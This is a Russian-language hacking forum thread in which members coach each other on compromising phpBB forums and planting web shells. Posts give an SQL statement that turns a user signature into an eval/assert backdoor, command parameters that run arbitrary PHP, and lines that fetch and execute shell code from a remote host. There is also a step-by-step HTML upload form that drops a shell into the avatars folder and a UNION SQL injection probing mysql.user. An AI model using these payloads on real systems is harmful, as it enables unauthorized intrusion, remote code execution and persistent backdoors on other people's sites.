Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Konqi можно через картинку, но не всегда это работает!
    а можно через восстановление БД:
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2;
    а потом в командной строке в профайле
    &cmd=phpinfo();
    или
    cmd=eval(file_get_contents('http://ххх.ru/down/shell.txt'));
     
  2. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163

    https://forum.antichat.ru/showpost.php?p=198446&postcount=3
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    2 GOGA075

    и где ставить этот sql запрос?
     
    _________________________
  4. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Создаешь файл 1.sql пихеш туда этот запрос, топаешь а админку и восстанавливаешь его там!
    потом топаешь в профайл и ...
    profile.php?mode=editprofile&cmd=phpinfo();
    видешь phpinf'у!
    ну а дальше шел...
     
    2 people like this.
  5. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Делаешь бекап базы,в файл это записываешь,и делаешь восстановление базы,ну или как-то так. :)
     
    1 person likes this.
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ok люди Щас папробую ))
     
    _________________________
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    парни сработал спасибо вам :D
     
    _________________________
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    phpinfo пашет а вот с шелом никак :(

    Parse error: syntax error, unexpected '<' in /home/z/u/zucchini/public_html/forum/includes/usercp_register.php(821) : regexp code(1) : assert code(1) : eval()'d code on line 1

    Warning: assert() [function.assert]: Assertion "eval(file_get_contents('http://mysite.com/shell.php'));" failed in /home/z/u/zucchini/public_html/forum/includes/usercp_register.php(821) : regexp code on line 1
     
    _________________________
  9. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Konqi расширение шела не php а txt и только txt!

    eval(file_get_contents('http://mysite.com/shell.txt'));
     
  10. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    А аплоадить шелл некак? :)
    5 сек дам линк на пост )

    https://forum.antichat.ru/showpost.php?p=1722124&postcount=10463
     
  11. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    как вариант можно попробовать впихнуть код через восстановление базы данных в форуме:
    eval(file_get_contents($_GET['e']));
    а потом обращаться
    http://site.com/images/sh.php?e=http://адресс_до_шела

    З.Ы или как Ctacok посоветовал, это проще)
     
    #12771 daniel_1024, 8 May 2010
    Last edited: 8 May 2010
  12. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    И как же этот код на сервер запихнуть?
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    GOGA075

    с текстом тоже самое
     
    _________________________
  14. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Ну тут 2 варианта.
    Либо что то нетак сделал, либо админ сервера закрыл урлы в cmd!
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    я ни так хорошо понял версию Ctacok

    куда нужно ставить эту форму аплоада ??
     
    _________________________
  16. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Konqi попробуй через иклуид!
     
    1 person likes this.
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    GOGA075 ты Эйнштейн. :)

    как можно было забыть такое!! :)

    shell загрузилось без каких либо проблем ;)
     
    _________________________
  18. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163

    1. создаёшь у себя на компе 1.html
    2. засовываешь туда
    HTML:
          <form action="http://your_site.ru/forum/profile.php?mode=editprofile&cmd=copy($_FILES[file][tmp_name], $_GET[bob]);&bob=/home/z/u/zucchini/public_html/forum/images/avatars/htaccess.php
    " method="post" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit" value="upload">
    </form>
         
    3. создаёшь 1.sql
    4. суёшь туда
    PHP:
          UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0'user_sig='phpbb:eval($_GET[cmd])' WHERE username='USERNAME';
        
    5. открываешь через браузер 1.html
    6. выбираешь шелл
    7. жмёшь upload
    8. проверяешь, http://your_site.ru/forum/images/avatars/htaccess.php

    так ясно? %)
     
    3 people like this.
  19. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    А может кто подскажет как через phpmyadmin сделать админом любого юзера форума phpbb3!
     
  20. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    119
    Likes Received:
    14
    Reputations:
    4
    Ребят, помогите залить шелл через двойной запрос.
    Не могу залить т.к magic_quotes = on

    ?uid=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user--

    выводится 2 и 8. file_priv = Y

    Почитал https://forum.antichat.ru/showpost.php?p=663815&postcount=39... не получается
     
Thread Status:
Not open for further replies.